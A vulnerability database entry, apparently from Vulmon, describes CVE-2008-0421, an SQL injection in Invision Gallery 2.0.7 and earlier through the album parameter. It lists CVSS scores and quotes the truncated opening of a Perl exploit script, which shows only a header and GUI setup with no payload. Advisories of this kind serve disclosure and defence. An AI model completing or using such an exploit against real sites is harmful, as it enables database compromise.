7.5
CVSSv2

CVE-2008-0421

Published: 23/01/2008 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in Invision Gallery 2.0.7 and previous versions allows remote malicious users to execute arbitrary SQL commands via the album parameter in a rate command.

Vulnerable Product Search on Vulmon Subscribe to Product

invision power services invision gallery

Exploits

#!/usr/bin/perl ## Invision Gallery version <= 207 sql injection exploit ## (c)oded by 1dtw0lf ## RST/GHC ## THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE ## KEEP IT PRIVATE use Tk; use Tk::BrowseEntry; use Tk::DialogBox; use LWP::UserAgent; $mw = new MainWindow(title => "r57ig207" ); $mw->geometry ( '420x510' ) ...